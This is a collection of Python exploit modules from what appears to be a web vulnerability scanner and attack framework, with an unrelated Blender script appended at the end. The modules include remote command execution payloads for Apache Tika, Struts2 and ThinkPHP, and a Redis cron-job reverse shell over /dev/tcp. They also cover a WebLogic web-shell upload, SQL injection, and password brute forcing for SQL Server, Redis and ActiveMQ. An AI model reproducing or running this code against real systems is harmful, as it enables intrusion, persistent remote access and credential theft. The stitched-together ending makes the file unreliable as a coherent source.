def exec(data):
init(data, 'apache')
if data['base_url']:
headers = {
"X-Tika-OCRTesseractPath": "\"cscript\"",
"X-Tika-OCRLanguage": "//E:Jscript",
"Expect": "100-continue",
"Content-type": "image/jp2",
"Connection": "close"
}
url = data['base_url'] + "meta"
jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');
'''.format(data['cmd'])
try:
res = curl('put', url, headers=headers, data=jscript)
if res != None and "X-Parsed-By" in res.text and "tika.parse" in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({
"info": res.text,
"key": "Apache Tika-server RCE"
})
except:
pass
return data
def prove(data):
init(data,'thinkcmf')
if data['base_url']:
url = data[
'base_url'] + "index.php?g=Portal&m=Article&a=edit_post"
_data = 'term=123&post[post_title]=123&post[post_title]=aaa&post_title=123&post[id][0]=bind&post[id][1]=0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))'
res = curl('post', url,data = _data)
if res != None and ':XPATH' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": url, "key": "thinkcmf 2.2.3 sql"})
return data
def prove(data):
init(data, 'django')
if data['base_url']:
try:
url = data['base_url'] + "/baidu.com"
res = curl('get',url)
if 'Location'in res.headers.keys():
if res.headers['Location'].startswith('//baidu.com'):
data['flag'] = 1
data['data'].append({"url": url})
data['res'].append({"info": url, "key": url})
except:
pass
return data
def prove(data):
init(data,'thinkcmf')
if data['base_url']:
url = data[
'base_url'] + "index.php?g=Comment&m=Widget&a=fetch"
_data = "templateFile=/../public/index&prefix=''&content=<php>file_put_contents('bytestforme1.php','<?php phpinfo();')</php>"
res = curl('post', url,data = _data)
if res != None and res.status_code == 200:
res = curl('get', data['base_url'] + "/bytestforme1.php")
if res != None and res.status_code == 200 and 'php.ini' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": url, "key": "thinkcmf 2.2.3 template inject"})
return data
def exec(data):
init(data,'web')
if data['base_url']:
headers ={ }
headers['Content-Type'] = 'application/x-www-form-urlencoded'
poc = 'c=system&f=%s&_method=filter' %parse.quote_plus(data['cmd'])
for path in ['public/','']:
for pocpath in ['index.php']:
url = data['base_url'] + path + pocpath
res = curl('post', url, data = poc,headers=headers)
if res != None and res.status_code == 500:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": res.text, "key": "thinkphp 51~52_getshell"})
return data
def rebound(data):
data = init(data, 'redis')
if 'local_host' not in data.keys() or 'local_port' not in data.keys():
raise Exception("None local_host or local_port")
try:
# ,socket_connect_timeout=data['timeout'],socket_timeout=data['timeout']
r = redis.Redis(data['target_host'], data['target_port'])
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(
ip=data["local_host"], port=str(data["local_port"], ))
path = '/var/spool/cron'
name = 'root'
key = _random_string(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
data['flag'] = 1
data['data'].append({
"key": key,
"payload": payload,
"path": path,
"name": name
})
data['res'].append({
"info": "Success",
"local_host": data["local_host"],
"local_port": str(data["local_port"])
})
except:
pass
return data
def exec(data):
data = init(data, 'web')
if data['base_url']:
q = queue.Queue()
alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
path = data['base_url'] if data['base_url'][-1] == '/' else data['base_url'] + '/'
for c in alphanum:
q.put( (path + c, '.*') ) # filename, extension
while True:
if q.qsize() <= 0:
break
url, ext = q.get(timeout=1.0)
status = _get_status(url + '*~1' + ext + '/1.aspx')
if status == 404:
if len(url) - len(path) < 6: # enum first 6 chars only
for c in alphanum:
q.put((url + c, ext))
else:
if ext == '.*':
q.put((url, ''))
if ext == '':
data['flag'] = 1
data['res'].append({"info": url + '~1', "key": 'iis_short_file for Dir'})
elif len(ext) == 5 or (not ext.endswith('*')): # .asp*
data['flag'] = 1
data['res'].append({"info": url + '~1' + ext, "key": 'iis_short_file for File'})
else:
for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
q.put((url, ext[:-1] + c + '*'))
if len(ext) < 4: # < len('.as*')
q.put((url, ext[:-1] + c))
return data
def prove(data):
data = init(data, 'confluence')
if data['base_url']:
filename = "../web.xml"
limitSize = 100
payload = data['base_url'] + "rest/tinymce/1/macro/preview"
headers = {
"User-Agent":
"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": data['base_url'] +
"pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
"Content-Type": "application/json; charset=utf-8"
}
_data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
try:
r = curl('post', payload, data=_data, headers=headers)
if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
data['flag'] = 1
data['data'].append({"content": content})
data['res'].append({"info": payload, "key": filename})
except:
pass
return data
def prove(data):
'''
比较耗时,建议单独跑脚本
'''
data = init(data, 'dedecms')
if data['base_url']:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
_data = {
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
for a in ['', 'dedecms/']:
url = data['base_url'] + a + 'tags.php'
back_dir = ""
flag = 0
res = curl('get', url)
if res!=None and res.status_code ==200:
for num in range(1, 7):
if flag ==1 :
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
r = curl('post', url, data=_data)
if r!=None:
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
flag = 0
x = 0
for i in range(30):
if flag == 1:
x = i
break
for ch in characters:
if ch == characters[-1]:
flag = 1
x = i
break
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
r = curl('post', url, data=_data)
if r != None:
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
if x < 29 and flag ==1:
data['flag'] = 1
data['data'].append({"url": data['base_url'] + a + back_dir})
data['res'].append({"info": data['base_url'] + a + back_dir, "key": 'dede_manage'})
return data
def exec(data=None):
data = init(data, 'struts')
if data['url'] != None:
cmd = data['cmd']
exec_poc = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='%COMMAND%').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b'''
headers = {}
try:
files = {
"test": (exec_poc.replace("%COMMAND%", cmd), "text/plain")
}
r = curl('post',
data['url'],
headers=headers,
files=files,
stream=True).text
res = ""
try:
for line in r.iter_lines():
res += str(line) + '\r\n'
except:
res = str(res)
data['flag'] = 1
data['data'].append({"poc": exec_poc})
data['res'].append({"info": res, "key": cmd})
except:
pass
return data
def upload(data=None):
data = init(data, 'weblogic')
if data['base_url']:
headers = {"Content-Type": "text/xml"}
url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
result = curl('post', url, data=shellpoc1, headers=headers)
targeturl = data['base_url'] + "/bea_wls_internal/ahtest.jsp"
result = curl('get', targeturl)
if str(result.status_code) == '200' and 'ahtest' in result.text:
data['flag'] = 1
data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({
"info": url,
"key": targeturl + "?pwd=ahtest&cmd=whoami"
})
else:
result = curl('post', url, data=shellpoc2, headers=headers)
targeturl = data['base_url'] + "/wls-wsat/ahtest.jsp"
result = curl('get', targeturl)
if str(result.status_code) == '200' and 'ahtest' in result.text:
data['flag'] = 1
data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({
"info": targeturl + "?pwd=ahtest&cmd=whoami",
"key": "/wls-wsat/CoordinatorPortType"
})
return data
def prove(data):
data = init(data, 'weblogic')
if data['base_url']:
headers = {"Content-Type": "text/xml"}
url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
ran = str(random.randint(100000, 999999))
poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
try:
result = curl('post', url, data=poc, headers=headers)
targeturl = data['base_url'] + "/bea_wls_internal/" + ran + ".txt"
result = curl('get', targeturl)
if result and str(
result.status_code
) == '200' and 'xmldecoder_vul_test' in result.text:
data['flag'] = 1
data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({"info": url, "key": targeturl})
else:
ran = str(random.randint(100000, 999999))
poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
result = curl('post', url, data=poc, headers=headers)
targeturl = data['base_url'] + "/wls-wsat/" + ran + ".txt"
result = curl('get', url)
if result and str(
result.status_code
) == '200' and 'xmldecoder_vul_test' in result.text:
data['flag'] = 1
data['data'].append(
{"page": '/wls-wsat/CoordinatorPortType'})
data['res'].append({"info": targeturl, "key": url})
except Exception as e:
pass
return data
def prove(data):
data = init(data, 'sqlserver')
if _socket_connect(data['target_host'], data['target_port']):
usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
) else _read_dic('dict/sqlserver_usernames.txt')
passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
) else _read_dic('dict/sqlserver_passwords.txt')
for linef1 in usernamedic:
username = linef1.strip('\r').strip('\n')
for linef2 in passworddic:
password = (
linef2 if '%user%' not in linef2 else str(linef2).replace(
"%user%", str(username))).strip('\r').strip('\n')
try:
db = pymssql.connect(server=data['target_host'],
port=data['target_port'],
user=username,
password=password,
charset="UTF-8")
data['flag'] = 1
data['data'].append({
"username": username,
"password": password
})
data['res'].append({
"info": username + "/" + password,
"key": 'sqlserver'
})
return data
except:
pass
return data
def prove(data):
data = init(data, 'web')
if data['url']:
try:
waf = None
res = curl('get', data['url'])
header = res.headers
html = res.text
mark_list = []
marks = _dna.strip().splitlines()
for mark in marks:
name, location, key, value = mark.strip().split("|", 3)
mark_list.append([name, location, key, value])
for mark_info in mark_list:
name, location, key, reg = mark_info
if location == "headers":
if re.search(reg, header, re.I) and key in header:
waf = name
break
if location == "index":
if re.search(reg, html, re.I):
waf = name
break
m = re.search('<title>(.*)?<\/title>', html)
if m:
print(m.group(1), 'title')
if waf != None:
data['flag'] = 1
data['res'].append({"info": waf, "key": "waf"})
except:
pass
return data
def prove(data):
data = init(data, 'activemq')
if data['base_url']:
usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
) else _read_dic('dict/activemq_usernames.txt')
passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
) else _read_dic('dict/activemq_passwords.txt')
url = data['base_url'] + "admin/"
for linef1 in usernamedic:
username = linef1.strip('\r').strip('\n')
for linef2 in passworddic:
try:
password = (linef2 if '%user%' not in linef2
else str(linef2).replace(
"%user%",
str(username))).strip('\r').strip('\n')
key = b64encode(":".join([username, password]))
data['headers']["Authorization"] = 'Basic %s' % key
res = curl('get', url)
if 'Console' in res.text:
data['flag'] = 1
data['data'].append({
"username": username,
"password": password
})
data['res'].append({
"info": username + "/" + password,
"key": "Authorization: " + key
})
except Exception:
pass
return data
def prove(data):
# from sslscan import ui
# ui.load_modules()
# scanner = ui.Scanner()
# for pro in ["ssl2","ssl3","tls10","tls11","tls12"]:
# scanner.config.set_value(pro, True)
# name, sep, options = 'server.ciphers'.partition(":")
# scanner.append_load(name, options, base_class=ui.BaseScan)
# name, sep, options = "term:rating=builtin.0_5".partition(":")
# scanner.append_load(name, options, base_class=ui.BaseReport)
# module = scanner.load_handler_from_uri("www.baidu.com")
# scanner.set_handler(module)
# scanner.reset_knowledge_base()
# scanner.run_scans()
# scanner.run_reports()
data = init(data, 'web')
if data['base_url']:
cmd = 'pysslscan scan --scan server.ciphers --scan=server.preferred_ciphers --ssl2 --ssl3 --tls10 --tls11 --tls12 ' + data[
'target_host']
# cmd = 'sslscan --no-colour --no-heartbleed --show-ciphers --sleep 500 --timeout=45 '+ data['target_host']
lines = _subprocess(cmd.split())
lines = lines.strip().split('\n')
poc = "?&mtestid=1%27%20and%20%271%27$%271"
ssllist = []
for line in lines:
# line = str(line, 'utf-8')
if "Accepted" in line or "Preferred" in line:
pattern = re.compile('[A-Z\d\_]{5,}')
match = pattern.search(line)
if match:
# TLS_RSA_WITH_AES_128_CBC_SHA
# curl --ciphers ecdhe_rsa_aes_256_sha https://www.baidu.com'
ciphers = match.group()
if ciphers in _openssl_ssls.keys():
ciphers_ciphers = _openssl_ssls[ciphers]
elif ciphers in _curl_ssls.keys():
ciphers_ciphers = _curl_ssls[ciphers]
else:
ciphers_ciphers = "-".join(ciphers.split("_")[1:])
if ciphers_ciphers not in ssllist:
res_status = _curl(data['base_url'], ciphers_ciphers,
poc)
# print("curl --ciphers " + ciphers_ciphers + " " + base_url + poc, str(res_status))
if res_status == 200:
data['flag'] = 1
data['data'].append({"ssl": ciphers})
data['res'].append({
"key":
ciphers + " " + str(res_status),
"info":
"curl --ciphers " + ciphers_ciphers + " " +
data['base_url'] + poc
})
ssllist.append(ciphers_ciphers)
# code = chardet.detect(waf_ssl)['encoding'] if chardet.detect(waf_ssl)['encoding'] not in ['ISO-8859-5','KOI8-R'] else 'gbk'
# print(waf_ssl.decode(code)+":"+code)
return data
def prove(data):
data = init(data, 'phpcms')
if data['base_url']:
headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4"}
for path in ["", "phpcms/"]:
url1 = data['base_url'] + path +"index.php?m=wap&c=index&a=init&siteid=1"
res1 = curl('get',url1,headers = headers)
if res1 !=None:
for cookie in res1.cookies:
if '_siteid' in cookie.name:
userid = cookie.value
url2 = data['base_url'] + path +"index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp"
_data1 = {'userid_flash': userid}
res2 = curl('post', url=url2, data=_data1,headers = headers)
if res2 != None:
for cookie in res2.cookies:
if '_att_json' in cookie.name:
att_json = cookie.value
url3 = data['base_url'] + path +"index.php?m=content&c=down&a=init&a_k=" + att_json
res3 = curl('get', url3,headers = headers)
if res3 !=None:
file = re.findall(r'<a href="(.+?)"', res3.text)[0]
url4 = data['base_url'] + path + 'index.php' + file
res4 = curl('get', url4,headers = headers)
if res4 !=None:
if '<?php' in res4.text:
data['flag'] = 1
data['data'].append({"url": url4})
data['res'].append({"info": url1, "key": "phpcms v9 download",'connect':res4.text})
return data
return data
def prove(data):
data = init(data, 'api')
dic = _initdic(data['target_host'], data['id'])
if dic['flag']:
dic = _byaizhan(data['target_host'], dic)
dic = _bychinaz(data['target_host'], dic)
dic = _by114best(data['target_host'], dic)
if not dic['flag']:
dic['domain'] = "Curl Failed"
else:
dic['domain'].append(data['target_host'])
if len(dic['domain']) > 0:
for domain in dic['domain']:
flag = False
dic, myflag = _ICPbybeianbeian(domain, dic)
flag |= myflag
if not myflag:
dic, myflag = _ICPbyaizhan(domain, dic)
flag |= myflag
if not myflag:
dic, myflag = _ICPsobeian(domain, dic)
flag |= myflag
# if not flag:
# dic['ICP'].append(domain)
if len(dic['ICP']) > 0:
data['flag'] = 1
for _icp in dic['ICP']:
data['res'].append({"info": _icp.strip('\r'), "key": "icp"})
return data
def prove(data):
data = init(data, "redis")
passworddic = _read_dic(data['d1']) if 'd1' in data.keys() else _read_dic(
'dict/redis_passwords.txt')
if _socket_connect(data['target_host'], data['target_port']):
for password in passworddic:
try:
password = password.strip('\r').strip('\n')
# ,socket_connect_timeout=data['timeout'],socket_timeout=data['timeout']
pool = redis.ConnectionPool(host=data['target_host'],
password=password,
port=data['target_port'])
r = redis.Redis(connection_pool=pool)
info = r.info()
data['flag'] = 1
data['data'].append({"password": password})
data['res'].append({
"info": password,
"key": password,
"redis_info": info
})
return data
except:
pass
return data
def prove(data):
init(data, 'discuz')
if data['base_url']:
dns = ceye_dns_api()
url = data[
'base_url'] + "plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=%s&wxopenid=%s" % (
dns, ''.join(
[random.choice(ascii_lowercase) for _ in range(8)]))
res = curl('get', url)
if res != None:
time.sleep(3)
if ceye_verify_api(dns, 'http'):
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": url, "key": "discuz x3.4 ssrf"})
return data
def prove(data):
init(data,'thinkphp')
if data['base_url']:
headers ={}
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for path in ['public/','']:
for poc in ['c=phpinfo&f=1&_method=filter',
'c=var_dump&f=1&_method=filter']:
url = data['base_url'] + path + 'index.php'
res = curl('post', url, data=poc,headers=headers)
if res != None :
if 'PHP Version' in res.text or 'string(8) "var_dump"' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({"info": url, "key": "thinkphp 51~52_getshell"})
break
return data
def prove(data):
init(data, 'kindeditor')
if data['base_url']:
try:
url = data['base_url'] + "kindeditor/php/upload_json.php?dir=file"
files = {
"imgFile":
('mytestforyou.html', "this is a test for you. ", "text/plain")
}
res = json.loads(curl('post', url, files=files))
if 'url' in res.keys() and 'kindeditor' in res['url']:
data['flag'] = 1
data['data'].append({"url": url})
data['res'].append({"info": url, "key": url})
except:
pass
return data
def exec(data):
init(data, 'web')
if data['base_url']:
headers = {}
headers['Content-Type'] = 'application/x-www-form-urlencoded'
poc = '_method=__construct&method=get&filter[]=system&server[REQUEST_METHOD]=%s' % parse.quote_plus(
data['cmd'])
for path in ['public/', '']:
for pocpath in ['index.php?s=captcha']:
url = data['base_url'] + path + pocpath
res = curl('post', url, data=poc, headers=headers)
if res != None and res.status_code == 500:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({
"info": res.text,
"key": "thinkphp 5.0.23 getshell"
})
return data
def prove(data):
data = init(data,'web')
if data['url']:
result = curl('get', data['url'])
if result != None:
status = result.status_code
# Text
webkeydic = _read_dic(data['dic_one']) if 'dic_one' in data.keys() else _read_dic('dict/web_content_key.txt')
content = result.text
key = ''
for searchkey in webkeydic:
searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "")
try:
if searchkey in content:
key += searchkey + ','
data['flag'] = 1
except Exception as e:
print(e)
pass
# title
soup = BeautifulSoup(result.text, "html5lib")
if soup != None:
codes = ['utf-8', 'gbk']
title = soup.title
if title == None or title.string == '':
title = "[None Title]".encode('utf-8')
else:
if result.encoding != None:
try:
title = title.string.encode(result.encoding)
codes.append(result.encoding)
except:
title = "[Error Code]".encode('utf-8')
else:
title = title.string
codes.append(type)
for j in range(0, len(codes)):
try:
title = title.decode(codes[j]).strip().replace("\r", "").replace("\n", "")
break
except:
continue
finally:
if j + 1 == len(codes):
title = '[Error Code]'
else:
title = '[None Title]'
if data['flag'] == 1:
data['res'].append({"info": title, "key": key[:-1], "status": status})
return data
def prove(data):
data = init(data,'iis')
if data['base_url']:
status_1 = _get_status(data['base_url']+ '/*~1*/a.aspx') # an existed file/folder
status_2 = _get_status(data['base_url'] + '/l1j1e*~1*/a.aspx') # not existed file/folder
if status_1 == 404 and status_2 != 404:
data['flag'] = 1
data['data'].append({"url": data['base_url']+ '/*~1*/a.aspx'})
data['res'].append({"info": '/*~1*/a.aspx', "key": 'iis_short_file'})
return data
def prove(data):
init(data, 'thinkphp')
if data['base_url']:
pocs = [
"index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",
"index.php?s=/index/\\think\\request/cache&key=1|phpinfo"
]
for path in ['', 'public/']:
for poc in pocs:
url = data['base_url'] + path + poc
res = curl('get', url)
if res != None and 'PHP Version' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({
"info": url,
"key": "thinkphp 5.1.31 getshell"
})
break
return data
def exec(data):
init(data, 'web')
if data['base_url']:
pocs = [
"index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%s"
% parse.quote_plus(data['cmd']),
"index.php?s=/index/\\think\\request/cache&key=%s|system" %
parse.quote_plus(data['cmd'])
]
for path in ['', 'public/']:
for poc in pocs:
url = data['base_url'] + path + poc
res = curl('get', url)
if res != None and res.status_code == 200:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({
"info": res.text,
"key": "thinkphp 5.1.31 getshell"
})
return data
def prove(data):
data = init(data, 'web')
if data['base_url'] != None:
try:
res = curl('options', data['base_url'] + "/testbyme")
allow = res.headers['Allow']
data['flag'] = 1
data['data'].append({"method": "options"})
data['res'].append({"info": allow, "key": "OPTIONS"})
except:
pass
return data
def prove(data):
data = init(data, 'web')
if data['url']:
try:
headers = curl('get', data['url']).headers
if 'cookies' in headers.keys():
cookies = headers['cookies'],
if not search(r'secure;', cookies, I):
data = _plus(data, 'Cookie without Secure flag set')
if not search(r'httponly;', cookies, I):
data = _plus(data, 'Cookie without HttpOnly flag set')
if search(r'domain\=\S*', cookies, I):
domain = findall(r'domain\=(.+?);', headers, I)
if domain:
data = _plus(
data,
'Session Cookie are valid only at Sub/Domain: %s' %
domain[0])
if search(r'path\=\S*', cookies, I):
path = findall(r'path\=(.+?);', headers, I)
if path:
data = _plus(
data,
'Session Cookie are valid only on that Path: %s' %
path[0])
if search(r'(.+?)\=\S*;', cookies, I):
cookie_sessions = findall(r'(.+?)\=\S*;', headers, I)
for cs in cookie_sessions:
if cs not in ['domain', 'path', 'expires']:
data = _plus(
data,
'Cookie Header contains multiple cookies')
break
if 'x-xss-protection' not in headers.keys():
data = _plus(data, 'X-XSS-Protection header missing',
'x-xss-protection')
if 'x-frame-options' not in headers:
data = _plus(data,
'Clickjacking: X-Frame-Options header missing',
'x-frame-options')
if 'content-type' not in headers:
data = _plus(data, 'Content-Type header missing',
'content-type')
if 'strict-transport-security' not in headers:
data = _plus(data, 'Strict-Transport-Security header missing',
'strict-transport-security')
if 'x-content-type-options' not in headers:
data = _plus(data, 'X-Content-Type-Options header missing',
'x-content-type-options')
except:
pass
return data
def prove(data):
init(data, 'thinkphp')
if data['base_url']:
headers = {}
headers['Content-Type'] = 'application/x-www-form-urlencoded'
for path in ['public/', '']:
for poc in [
'_method=__construct&method=get&filter[]=phpinfo&server[REQUEST_METHOD]=1',
'_method=__construct&method=get&filter[]=var_dump&server[REQUEST_METHOD]=this_is_a_test'
]:
url = data['base_url'] + path + 'index.php?s=captcha'
res = curl('post', url, data=poc, headers=headers)
if res != None:
if 'PHP Version' in res.text or 'string(14) "this_is_a_test"' in res.text:
data['flag'] = 1
data['data'].append({"flag": url})
data['res'].append({
"info": url,
"key": "thinkphp 5.0.23 getshell"
})
break
return data
import bpy, sys, os #Open up the bootstrapConfig.py filename = os.getcwd()+'/bootstrapConfig.py' exec(compile(open(filename).read(), filename, 'exec')) #Set system path to include title sys.path.append(os.getcwd()+"/../Titles/"+params['__Category']+"/"+params['__TitleName']) #import the title script and pass params to it. bpy.data.scenes[0].render.filepath = '//../../../Output/'+params['__OutFileName']+'.avi' bpy.data.scenes[0].render.resolution_percentage = int(params['__Resolution']) bpy.data.scenes[0].render.image_settings.file_format = 'AVI_JPEG' import script script.init(params)
